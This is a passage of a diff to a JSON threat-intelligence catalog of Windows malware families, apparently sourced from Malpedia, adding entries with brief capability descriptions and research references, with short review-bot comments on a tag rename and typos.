"https://www.carbonblack.com/2020/02/20/threat-analysis-active-c2-discovery-using-protocol-emulation-part2-winnti-4-0/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", "https://github.com/TKCERT/winnti-detector", - "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", - "https://securelist.com/games-are-over/70991/", - "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf" + "https://github.com/superkhung/winnti-sniff", + "https://content.fireeye.com/apt-41/rpt-apt41/", + "https://content.fireeye.com/api/pdfproxy?id=86840", + "https://github.com/br-data/2019-winnti-analyse/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://github.com/TKCERT/winnti-nmap-script", + "https://www.lastline.com/labsblog/helo-winnti-attack-scan/", + "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf", + "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage" + ], + "synonyms": [ + "BleDoor", + "JUMPALL", + "Pasteboy", + "RbDoor" ], - "synonyms": [], "type": [] }, "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", @@ -18174,7 +32753,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot", "https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/", - "https://securelist.com/atm-robber-winpot/89611/" + "https://securelist.com/atm-robber-winpot/89611/", + "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/" ], "synonyms": [ "ATMPot" 
@@ -18202,6 +32782,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot",
+ "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
 "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf"
 ],
 "synonyms": [],
@@ -18244,8 +32826,7 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu",
- "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu"
 ],
 "synonyms": [],
 "type": []
@@ -18282,6 +32863,48 @@ "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", "value": "Woolger" }, + { + "description": "WORMHOLE is a TCP tunneler that is dynamically configurable from a C&C server and can communicate with an additional remote machine endpoint for a relay.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole", + "https://content.fireeye.com/apt/rpt-apt38", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c1bff74d-873d-41ad-9f76-b341e6fe5cb9", + "value": "WORMHOLE" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wormlocker", + "https://twitter.com/Kangxiaopao/status/1355056807924797440" + ], + "synonyms": [ + "WormLckr" + ], + "type": [] + }, + "uuid": "4cc30b46-53c0-45c4-8847-e3b228bf8d7b", + "value": "WormLocker" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wpbrutebot", + "https://www.zscaler.com/blogs/security-research/malware-leveraging-xml-rpc-vulnerability-exploit-wordpress-sites" + ], + "synonyms": [], + "type": [] + }, + "uuid": "454e0737-98d6-499a-8562-1adf5c081d0d", + "value": "WpBruteBot" + }, { "description": "", "meta": { 
@@ -18295,18 +32918,37 @@ "uuid": "62fd2b30-55b6-474a-8d72-31e492357d11", "value": "WSCSPL" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.x4", + "https://www.gradiant.org/noticia/analysis-malware-cve-2017/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "107341e7-e045-4798-9fab-16691e86bc58", + "value": "x4" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", - "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", + "https://assets.documentcloud.org/documents/3461560/Google-Aquarium-Clean.pdf", + "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", "https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf" + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", + "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" ], "synonyms": [ "chopstick", 
@@ -18342,6 +32984,92 @@ "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed", "value": "XBTL" }, + { + "description": "According to ESET Research, XDDown is a primary malware component and is strictly a downloader. It persists on the system using the traditional Run key. It downloads additional plugins from the hardcoded C&C server using the HTTP protocol. The HTTP replies contain PE binaries encrypted with a hardcoded two-byte XOR key. Plugins include a module for reconnaissance on the affected system, crawling drives, file exfiltration, SSID gathering, and grabbing saved passwords.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy", + "https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf", + "https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/", + "https://github.com/eset/malware-ioc/tree/master/xdspy/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2cf836f5-b88a-417d-b3c6-ab2580fea6ad", + "value": "XDSpy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xenon", + "https://twitter.com/3xp0rtblog/status/1331974232192987142" + ], + "synonyms": [], + "type": [] + }, + "uuid": "09fd85b1-6fc9-45af-a37e-732b5fc6447b", + "value": "Xenon Stealer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfsadm", + "https://twitter.com/VK_Intel/status/1149454961740255232", + "https://twitter.com/r3c0nst/status/1149043362244308992" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e78a2a31-8c20-4493-b854-c708e81b3f41", + "value": "XFSADM" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfscashncr", + "https://blog.cyttek.com/2019/08/28/other-day-other-malware-in-the-way-died-exe/", + "https://twitter.com/r3c0nst/status/1166773324548063232" + ], + "synonyms": [], + "type": [] + }, + "uuid": 
"ba99edf0-1603-4f54-8fa9-18852417d0fc", + "value": "XFSCashNCR" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiaoba", + "https://id-ransomware.blogspot.com/2017/10/xiaoba-ransomware.html" + ], + "synonyms": [ + "FlyStudio Ransomware" + ], + "type": [] + }, + "uuid": "e839ae61-616c-4234-8edb-36b48040e5af", + "value": "XiaoBa Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xp10", + "https://id-ransomware.blogspot.com/2020/08/xp10-ransomware.html" + ], + "synonyms": [ + "FakeChrome Ransomware" + ], + "type": [] + }, + "uuid": "6aa7047f-7dfa-4a10-b515-853c3795db69", + "value": "XP10 Ransomware" + }, { "description": "", "meta": { @@ -18361,6 +33089,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra", + "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/", "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis" ], @@ -18372,6 +33101,20 @@ "uuid": "5f9ba149-100a-46eb-a959-0645d872975b", "value": "XPCTRA" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat", + "https://labs.k7computing.com/?p=15672", + "https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d03cb3af-2a01-4e46-859a-6b61f3ec3c68", + "value": "XpertRAT" + }, { "description": "", "meta": { 
@@ -18385,6 +33128,22 @@ "uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae", "value": "XP PrivEsc (CVE-2014-4076)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xserver", + "https://norfolkinfosec.com/filesnfer-tool-c-python/", + "https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf" + ], + "synonyms": [ + "Filesnfer" + ], + "type": [] + }, + "uuid": "b895ec07-19f7-4131-87c0-fc713fff2351", + "value": "XServer" + }, { "description": "", "meta": { 
@@ -18409,20 +33168,26 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel", "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", - "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/", + "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", + "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government", + "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf", "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf" ], "synonyms": [ + "Shunnael", + "X-Tunnel", "xaps" ], "type": [] }, "uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74", - "value": "X-Tunnel" + "value": "XTunnel" }, { "description": "This is a rewrite of win.xtunnel using the .NET framework that surfaced late 2017.", 
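Review bot: Changing `"value": "X-Tunnel"` to `"value": "XTunnel"` at the end of this hunk alters the name the galaxy tag is presumably derived from, so data already tagged with the old name will no longer resolve to this element even though the UUID `53089817-6d65-4802-a7d2-5ccc3d919b74` is unchanged; adding `"X-Tunnel"` to `synonyms` helps lookups but does not repair existing tags. The .NET variant whose description starts on the hunk's last line keeps the hyphenated `"X-Tunnel (.NET)"` (visible in the next hunk), so two closely related elements now spell the base name differently. If the rename comes straight from the Malpedia export, it is worth calling out in the commit message so downstream users can remap the old tag.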
@@ -18438,7 +33203,7 @@ "value": "X-Tunnel (.NET)" }, { - "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", + "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it \u201cXwo\u201d - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo", @@ -18455,9 +33220,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "https://jsac.jpcert.or.jp/archive/2019/pdf/JSAC2019_8_nakatsuru_en.pdf", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + "https://www.cybereason.com/blog/labs-shadowwali-new-variant-of-the-xxmm-family-of-backdoors", + "https://www.macnica.net/mpressioncss/feature_05.html/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-butler" ], "synonyms": [ "ShadowWalker" 
@@ -18482,6 +33251,48 @@ "uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8", "value": "Yahoyah" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yakuza_ransomware", + "https://id-ransomware.blogspot.com/2020/03/teslarvng-ransomware.html" + ], + "synonyms": [ + "Teslarvng Ransomware" + ], + "type": [] + }, + "uuid": "0308eff9-1e8c-434e-b551-40f0ceb7dc0e", + "value": "Yakuza Ransomware" + }, + { + "description": "Yarraq is a ransomware that encrypts files by using asymmetric keys and adding '.yarraq' as extension to the end of filenames. At the time of writing the attacker asks for $2000 ransom in order to provide a decryptor, to enable victims to restore their original files back. To communicate with the attacker the email: cyborgyarraq@protonmail.ch is provided.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yarraq", + "https://yomi.yoroi.company/report/5e1d7b06c21640608183de58/5e1d7b09d1cc4993da62f261/overview", + "https://twitter.com/GrujaRS/status/1210541690349662209" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3bba089d-cd27-465c-8c40-2ff9ff0316c6", + "value": "Yarraq Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yatron", + "https://securelist.com/ransomware-two-pieces-of-good-news/93355/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "710a27e6-0f17-4fa7-bcb9-e130fcb1ee7f", + "value": "Yatron" + }, { "description": "", "meta": { 
@@ -18498,6 +33309,34 @@ "uuid": "81157066-c2f6-4625-8070-c0a793d57e18", "value": "yayih" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yellow_cockatoo", + "https://redcanary.com/blog/yellow-cockatoo/" + ], + "synonyms": [ + "Polazer" + ], + "type": [] + }, + "uuid": "f1d49672-b857-4ad6-887f-f2bf2bc7c641", + "value": "Yellow Cockatoo RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yoddos", + "https://www.bitdefender.com/files/News/CaseStudies/study/271/Bitdefender-Whitepaper-Scranos-2.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8d67586f-3390-474b-a81e-8be90833f25f", + "value": "Yoddos" + }, { "description": "Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n", "meta": { @@ -18518,8 +33357,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty", + "http://blog.ptsecurity.com/2019/11/studying-donot-team.html", "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/", - "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" + "https://www.secureworks.com/research/threat-profiles/zinc-emerson", + "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/", + "https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/" ], "synonyms": [], "type": [] 
@@ -18527,19 +33369,66 @@ "uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200", "value": "yty" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.z3", + "https://id-ransomware.blogspot.com/2020/08/z3-ransomware.html" + ], + "synonyms": [ + "Z3enc Ransomware" + ], + "type": [] + }, + "uuid": "3eb96cd0-2d00-45a8-a0a4-54663cc70ab9", + "value": "Z3 Ransomware" + }, + { + "description": "Bitdefender describes the primary features of the family as follows: Presence of a rootkit driver that protects itself as well as its other components, presence of man-in-the-browser capabilities that intercepts and decrypts SSL communications, and presence of an adware cleanup routine used to remove potential competition in the adware space. It also communicates with its C&C server, sending environment information such as installed AV and other applications. The malware also takes screenshots and does browser redirects, potentially manipulating the DOM tree. It also creates traffic in hidden windows, likely causing adfraud. 
The malware is generally very configurable and internally makes use of Lua scripts.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zacinlo", + "https://labs.bitdefender.com/wp-content/uploads/downloads/six-years-and-counting-inside-the-complex-zacinlo-ad-fraud-operation/" + ], + "synonyms": [ + "s5mark" + ], + "type": [] + }, + "uuid": "5041fed8-25a2-4da2-b2ab-db2364cc064f", + "value": "Zacinlo" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", - "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/", - "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware", - "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", + "https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/", + "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/", "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b", + "https://research.checkpoint.com/malware-against-the-c-monoculture/", + "https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og", + "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/", + "https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", + "https://securelist.com/zebrocys-multilanguage-malware-salad/90680/", 
"https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html", "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html", + "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/", + "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/", + "https://meltx0r.github.io/tech/2019/10/24/apt28.html", + "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://securelist.com/a-zebrocy-go-downloader/89419/" ], "synonyms": [ @@ -18555,7 +33444,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy_au3", - "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/" + "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", + "https://www.secureworks.com/research/threat-profiles/iron-twilight" ], "synonyms": [], "type": [] 
@@ -18575,6 +33465,36 @@ "uuid": "2211eade-4980-4143-acd7-5ecda26d9dfa", "value": "Zedhou" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeoticus", + "https://labs.sentinelone.com/zeoticus-2-0-ransomware-with-no-c2-required/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "92e89ff1-eae9-4d71-9031-80cca544952e", + "value": "Zeoticus" + }, + { + "description": "Zeppelin is a ransomware written in Delphi and sold a as-a-service. The Cylance research team notes that it is a clear evolution of the known VegaLocker, but they assessed it as a new family becaue of additionally developed modules that makes Zeppelin much more configurable than Vegalocker. There are executable variants of type DLL and EXE.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeppelin_ransomware", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team___Zeppelin_Ransomware_Analysis.pdf", + "https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin", + "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", + "https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5587d163-d5ec-43fc-8071-7e7cd1002ba7", + "value": "Zeppelin Ransomware" + }, { "description": "", "meta": { 
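Review bot: The Zeppelin description added in this hunk carries two typos, `sold a as-a-service` and `becaue`, which should read `sold as-a-service` and `because`; since the commit pulls the text from the Malpedia API, the fix belongs upstream or it will be overwritten on the next sync. The ZeroCleare description in a later hunk has the same issue (`would therefore not runnable by default` and the unexpanded abbreviation `DSE`).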
@@ -18582,11 +33502,12 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess", "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html", "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/", - "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/", - "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html", + "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/", + "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html", "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/", + "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/", "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/" ], "synonyms": [ 
@@ -18599,6 +33520,21 @@ "uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7", "value": "ZeroAccess" }, + { + "description": "ZeroCleare is a destructive malware. It has been developed in order to wipe the master boot record section in order to damage a disk's partitioning. Attackers use the EldoS RawDisk driver to perform the malicious action, which is not a signed driver and would therefore not runnable by default. The attackers managed to install it by using a vulnerable version of VBoxDrv driver, which the DSE accepts and runs. Used to attack middle-east energy and industrial sectors.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.ibm.com/downloads/cas/OAJ4VZNJ" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a7e1429f-55bd-41ac-bf45-70c93465d113", + "value": "ZeroCleare" + }, { "description": "ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.\r\n\r\nIt first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=).\r\nSo far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes generated.\r\n\r\nThe ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).\r\n", "meta": { 
@@ -18612,6 +33548,19 @@ "uuid": "585f9f75-1239-4561-8815-c5ae033053a1", "value": "ZeroEvil" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerolocker", + "http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b226e6bb-b8bf-4c5d-b0b3-c7c04d12679a", + "value": "ZeroLocker" + }, { "description": "", "meta": { 
@@ -18630,23 +33579,31 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus", - "https://zeustracker.abuse.ch/monitor.php", - "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", - "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html", - "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", - "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", - "http://eternal-todo.com/blog/new-zeus-binary", + "https://www.s21sec.com/en/zeus-the-missing-link/", + "https://www.secureworks.com/research/threat-profiles/gold-evergreen", "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html", "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite", - "https://nakedsecurity.sophos.com/2010/07/24/sample-run/", - "https://www.mnin.org/write/ZeusMalware.pdf", - "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20", + "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", + "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/", + "http://eternal-todo.com/blog/new-zeus-binary", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html", "http://eternal-todo.com/blog/zeus-spreading-facebook", "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf", - "http://eternal-todo.com/blog/detecting-zeus", "https://www.secureworks.com/research/zeus?threat=zeus", + "https://www.secureworks.com/research/threat-profiles/bronze-woodland", + 
"http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", + "http://eternal-todo.com/blog/detecting-zeus", + "https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf", + "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", + "https://nakedsecurity.sophos.com/2010/07/24/sample-run/", + "https://www.mnin.org/write/ZeusMalware.pdf", + "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf", + "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html", "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html" ], "synonyms": [ @@ -18657,6 +33614,20 @@ "uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a", "value": "Zeus" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_action", + "https://twitter.com/benkow_/status/1136983062699487232", + "https://www.youtube.com/watch?v=EyDiIAt__dI" + ], + "synonyms": [], + "type": [] + }, + "uuid": "95057d7a-b95a-4173-bae7-9256ae002543", + "value": "ZeusAction" + }, { "description": "", "meta": { @@ -18674,7 +33645,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl", - "https://asert.arbornetworks.com/great-dga-sphinx/", + "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/", "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/", "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/" ], 
